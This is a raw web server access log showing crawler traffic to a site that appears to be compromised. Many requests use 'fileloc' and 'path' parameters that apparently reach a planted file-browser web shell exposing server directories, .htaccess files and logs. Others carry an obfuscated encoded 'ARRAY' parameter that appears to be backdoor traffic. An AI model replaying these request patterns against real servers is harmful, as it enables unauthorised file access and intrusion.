216.73.217.81 - - [01/May/2026:11:31:10 +0300] "GET / HTTP/2" 200 8232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.164 - - [01/May/2026:11:31:18 +0300] "GET /shop/hyperotreti/malnourished011666024177.html HTTP/1.1" 200 28811 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [01/May/2026:11:31:13 +0300] "GET /14474-2/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fphp3k9fly&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5021 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.89.129.229 - - [01/May/2026:11:31:22 +0300] "GET /index.php?shop/thrum/noising004291206043.html HTTP/2" 200 8266 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.78.2 - - [01/May/2026:11:31:24 +0300] "GET /?detail/631580203 HTTP/1.1" 200 28858 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:31:24 +0300] "GET /14474-2/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F04%2F04271.mp4&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F04 HTTP/2" 200 2859 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:31:27 +0300] "GET /14474-2/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpxNlvUs&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5007 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:31:29 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fjs%2Fjs%2Fjs HTTP/2" 200 3269 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:31:22 +0300] "GET /14474-2/'?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:31:31 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fpage-list.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks HTTP/2" 200 6107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:29:34 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373737342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343137342q3331316531323062663933336365346234643034393939336565616337336663222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:11:31:35 +0300] "GET /?detail/53666030 HTTP/1.1" 200 29920 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:31:33 +0300] "GET /detail/985235375?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fphp0p5kSy&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 4998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:31:39 +0300] "GET /14474-2/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpjGrIiX&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5017 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:11:31:48 +0300] "GET /shop/deligate/classy212703070543.html HTTP/1.1" 200 28908 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:31:44 +0300] "GET /14474-2/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fphps8EM87&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.38.147.198 - - [01/May/2026:11:31:45 +0300] "GET /index.php?shop/streptococci/chargh022069735248.html HTTP/2" 200 8258 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:11:29:56 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373739362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343139362q3137303235633639353630383035366531393735353763313931316430386366222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:31:53 +0300] "GET /14474-2/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpSTaOaz&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:32:00 +0300] "GET /detail/692715066?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Flanguages%2Fadmin-network-tr_TR.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Flanguages HTTP/2" 200 19950 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.164 - - [01/May/2026:11:32:02 +0300] "GET /?detail/604378841 HTTP/1.1" 200 28459 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:32:04 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2025%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2025 HTTP/2" 200 2949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:32:06 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FdbTemp.UKbhmp HTTP/2" 200 2886 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:32:09 +0300] "GET /detail/692715066?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Flanguages%2Fuk.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Flanguages HTTP/2" 200 2856 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.226.252 - - [01/May/2026:11:32:09 +0300] "GET /index.php?shop/steward/aestivalis051030848820.html HTTP/2" 200 8234 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:32:11 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins%2Fcontact-form-7-pt_PT.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins HTTP/2" 200 19586 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:32:13 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fjs%2Fdist%2Fblock-serialization-default-parser.min.js&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fjs%2Fdist HTTP/2" 200 3991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:32:15 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fgroup%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fgroup HTTP/2" 200 3835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:32:17 +0300] "GET /detail/692715066?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Flanguages%2Fsv_SE.l10n.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Flanguages HTTP/2" 200 101324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:30:19 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373831392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343231392q3336313538383566386165373632326537633439663163303730316631386330222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:32:21 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net%2Fnextgen-demo-oyna.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2Fmiroglu.net HTTP/2" 200 4798 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:32:23 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpAZNBtD&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 2824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:32:27 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpfTt4FJ&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:11:32:28 +0300] "GET /shop/obviously/porotic484132678113.html HTTP/1.1" 200 28486 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:32:31 +0300] "GET /detail/692715066?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Flanguages%2Fadmin-tl.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Flanguages HTTP/2" 200 2860 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.242.85 - - [01/May/2026:11:32:33 +0300] "GET /index.php?shop/standage/empirical002126695139.html HTTP/2" 200 8253 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
40.77.167.61 - - [01/May/2026:11:32:35 +0300] "GET /sitemap-sub-600.xml HTTP/2" 200 38244 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.78.1 - - [01/May/2026:11:32:39 +0300] "GET /?detail/925098320 HTTP/1.1" 200 29853 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:30:47 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373834372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343234372q3135623361376339353861393239396636373865343936616330333839623533222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.1 - - [01/May/2026:11:32:50 +0300] "GET /?detail/797781198 HTTP/1.1" 200 30618 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.226.98 - - [01/May/2026:11:32:57 +0300] "GET /index.php?shop/soliloquies/attenuating013186328283.html HTTP/2" 200 8268 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:33:02 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fphpt4To5a&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 2824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:33:05 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Flogs%2Fserhatburke.miroglu.net%2Faccess_ssl_log.processed.5.gz&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Flogs%2Fserhatburke.miroglu.net HTTP/2" 200 2838 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:33:08 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fui HTTP/2" 200 3965 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:31:09 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373836392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343236392q3130366532666535363564646636666261313266313634303830373735303534222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:33:12 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpSTaOaz&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:33:14 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpXvNua8&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.17 - - [01/May/2026:11:33:17 +0300] "GET /discover-the-unique-features-of-sushiswap-dex-today-2/ HTTP/1.1" 200 10382 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
54.38.147.251 - - [01/May/2026:11:33:21 +0300] "GET /index.php?shop/sleepwaking/chamisal041187491383.html HTTP/2" 200 8245 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:33:22 +0300] "GET /14474-2/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fphpr8Id1I&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5006 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:33:26 +0300] "GET /detail/985235375?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F84-1-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2863 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:31:31 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373839312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343239312q3931663830353136656466663133303831646237363133616362623135333563222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.163 - - [01/May/2026:11:33:30 +0300] "GET /?detail/511080909 HTTP/1.1" 200 28431 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [01/May/2026:11:33:33 +0300] "GET /?detail/808561805 HTTP/1.1" 200 29113 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:33:30 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpbhB0Q1&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.17 - - [01/May/2026:11:33:38 +0300] "GET /2025/10/page/11/ HTTP/1.1" 200 10358 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
51.195.215.152 - - [01/May/2026:11:33:44 +0300] "GET /index.php?shop/sized/humped042633165996.html HTTP/2" 200 8246 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:33:44 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Flogs%2Ferror_log.3.gz&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Flogs HTTP/2" 200 5002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:11:31:53 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632373931332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343331332q3165316161663137633435333162616464663838623838316637666530396137222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:11:33:48 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2Fphp7KirEr&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 5007 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:33:52 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp%2FphpbUpP1E&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2F.cagefs%2Ftmp HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:11:34:03 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Ffi.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 2831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.183.209 - - [01/May/2026:11:34:07 +0300] "GET /index.php?shop/resorter/endearedness022512368241.html HTTP/2" 200 8236 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:11:34:08 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fclass-wp-customize-nav-menus.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes HTTP/2" 200 17857 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:11:34:10 +0300] "GET /?detail/585180616 HTTP/1.1" 200 29062 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:11:34:13 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Fplugins%2Fmeta-box%2Fmeta-box%2Fcss HTTP/2" 200 4343 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
